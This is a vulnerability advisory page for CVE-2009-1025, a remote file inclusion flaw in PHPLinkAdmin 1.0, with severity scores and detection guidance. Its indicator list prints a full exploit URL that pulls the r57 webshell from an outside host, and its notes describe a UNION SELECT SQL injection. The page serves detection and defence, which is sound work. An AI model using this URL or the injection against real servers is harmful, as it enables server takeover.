cbcvebase.
CVE-2009-1025
published 2009-03-20

CVE-2009-1025: PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the…

PriorityP355high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
29.83%
98.0th percentile
PHP remote file inclusion vulnerability in linkadmin.php in Beerwin PHPLinkAdmin 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the page parameter.

Affected

1 ranges
VendorProductVersion rangeFixed in
beerwinphplinkadmin

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://127.0.0.1/path/linkadmin.php?page=http://www.kortech.cn/bbs//skin/zero_vote/r57.txt?
domainwww.kortech.cn
path/bbs//skin/zero_vote/r57.txt
filenamer57.txt
path/path/linkadmin.php
  • Monitor HTTP requests to linkadmin.php where the 'page' parameter contains an external URL (http:// or https://), indicating a Remote File Inclusion attempt.
  • The RFI payload appends a trailing '?' to the remote URL to nullify any local file extension appended by the include statement — detect this pattern in the 'page' parameter value.
  • The vulnerable include is triggered without authentication ('Direct acces to linkadmin.No auth.'); alert on any unauthenticated access to linkadmin.php with a non-empty 'page' parameter.
  • Detect SQL injection attempts against edlink.php via the 'linkid' parameter, specifically payloads using UNION SELECT with concat_ws to extract user(), database(), and version().
  • The r57 webshell (r57.txt) is the payload delivered via RFI; presence of r57.txt or r57.php on the filesystem or in web logs is a strong indicator of compromise.
  • ·The vulnerable code uses $_REQUEST['page'] with no sanitization or authentication check, meaning the RFI is exploitable by any unauthenticated remote attacker.
  • ·The SQL injection in edlink.php also uses $_REQUEST['linkid'] with no sanitization, making it exploitable without authentication as well.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.